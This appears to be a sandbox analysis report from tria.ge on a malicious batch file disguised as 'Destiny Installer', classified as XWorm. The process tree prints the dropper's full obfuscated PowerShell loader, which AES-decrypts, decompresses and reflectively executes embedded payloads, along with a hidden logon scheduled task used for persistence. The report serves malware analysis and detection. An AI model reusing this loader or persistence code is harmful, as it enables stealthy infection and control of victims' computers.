Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
109s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2025, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
destiny installer/Destiny Installer.bat
Resource
win7-20240903-en
General
-
Target
destiny installer/Destiny Installer.bat
-
Size
327KB
-
MD5
2ae432966df2247f6019b7f4f92133b5
-
SHA1
ccffdee15b76f1239ff1552b0b5992b04753096b
-
SHA256
b7993ee9e7a074d2fd1a39756bf13e276722043be49e932a5c1540cecd7f7a61
-
SHA512
83b254cbfbaedca5904d761466d638de7b758986f572679cf80c0cafbd20ffd46dc4aa97c04ace4d650ea073a25459cf2d6ef32275e2ca1ce11e0d22fed1a569
-
SSDEEP
6144:IGuBeLEz1JHrfxWyiFwx5mnJ7x2AxQ4SEqxqH284++gGZzmdH2lXVKwT5gJy9pHC:ItBe6bHVWy7ATxQ49H284+dGZzUH21wd
Malware Config
Extracted
xworm
5.0
127.0.0.1:7000
3axbgW4A6QodtIl7
-
Install_directory
%ProgramData%
-
install_file
Destiny Installer.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4040-49-0x000001BEA61E0000-0x000001BEA61FA000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 28 4040 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1396 powershell.exe 1908 powershell.exe 4040 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1396 powershell.exe 1396 powershell.exe 1908 powershell.exe 1908 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe Token: 36 1908 powershell.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe Token: 36 1908 powershell.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4120 wrote to memory of 1396 4120 cmd.exe 91 PID 4120 wrote to memory of 1396 4120 cmd.exe 91 PID 1396 wrote to memory of 1908 1396 powershell.exe 92 PID 1396 wrote to memory of 1908 1396 powershell.exe 92 PID 1396 wrote to memory of 5028 1396 powershell.exe 97 PID 1396 wrote to memory of 5028 1396 powershell.exe 97 PID 5028 wrote to memory of 4428 5028 WScript.exe 98 PID 5028 wrote to memory of 4428 5028 WScript.exe 98 PID 4428 wrote to memory of 4040 4428 cmd.exe 101 PID 4428 wrote to memory of 4040 4428 cmd.exe 101
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbpOv5Dd20QS+jAUaxWzfQ8Ue7OWB/lZpkmUiDzmjXc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+oOxt502v2luXR//6oDybA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OrPUq=New-Object System.IO.MemoryStream(,$param_var); $PVXiG=New-Object System.IO.MemoryStream; $QksXF=New-Object System.IO.Compression.GZipStream($OrPUq, [IO.Compression.CompressionMode]::Decompress); $QksXF.CopyTo($PVXiG); $QksXF.Dispose(); $OrPUq.Dispose(); $PVXiG.Dispose(); $PVXiG.ToArray();}function execute_function($param_var,$param2_var){ $dhbrq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UQwuM=$dhbrq.EntryPoint; $UQwuM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat';$AwDLs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat').Split([Environment]::NewLine);foreach ($zLvFY in $AwDLs) { if ($zLvFY.StartsWith(':: ')) { $OBKgh=$zLvFY.Substring(3); break; }}$payloads_var=[string[]]$OBKgh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_258_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_258.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_258.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_258.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbpOv5Dd20QS+jAUaxWzfQ8Ue7OWB/lZpkmUiDzmjXc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+oOxt502v2luXR//6oDybA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OrPUq=New-Object System.IO.MemoryStream(,$param_var); $PVXiG=New-Object System.IO.MemoryStream; $QksXF=New-Object System.IO.Compression.GZipStream($OrPUq, [IO.Compression.CompressionMode]::Decompress); $QksXF.CopyTo($PVXiG); $QksXF.Dispose(); $OrPUq.Dispose(); $PVXiG.Dispose(); $PVXiG.ToArray();}function execute_function($param_var,$param2_var){ $dhbrq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UQwuM=$dhbrq.EntryPoint; $UQwuM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_258.bat';$AwDLs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_258.bat').Split([Environment]::NewLine);foreach ($zLvFY in $AwDLs) { if ($zLvFY.StartsWith(':: ')) { $OBKgh=$zLvFY.Substring(3); break; }}$payloads_var=[string[]]$OBKgh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5773440cd6eb4e778c7d2115d1f231f75
SHA14b600aa41fcd267817961c95b104a0717c40e558
SHA25664c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c
SHA512af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
327KB
MD52ae432966df2247f6019b7f4f92133b5
SHA1ccffdee15b76f1239ff1552b0b5992b04753096b
SHA256b7993ee9e7a074d2fd1a39756bf13e276722043be49e932a5c1540cecd7f7a61
SHA51283b254cbfbaedca5904d761466d638de7b758986f572679cf80c0cafbd20ffd46dc4aa97c04ace4d650ea073a25459cf2d6ef32275e2ca1ce11e0d22fed1a569
-
Filesize
115B
MD51688db2f987657a17e4a93b28355d1d3
SHA1229d01f2b7e34378fce0660da57e5bf9b54875b1
SHA25682d5a1368d981e3b920b7a6333867b1e079f3f9d1bde88165bca9be9c45b70aa
SHA512bafe980672739e23949d7564df205ba9d7a6ec4a003991b73d01e629e344b42a322470e26c2c0e301b51ff4d92144677a6dbfa2b10297a9bc5bd8734373cd557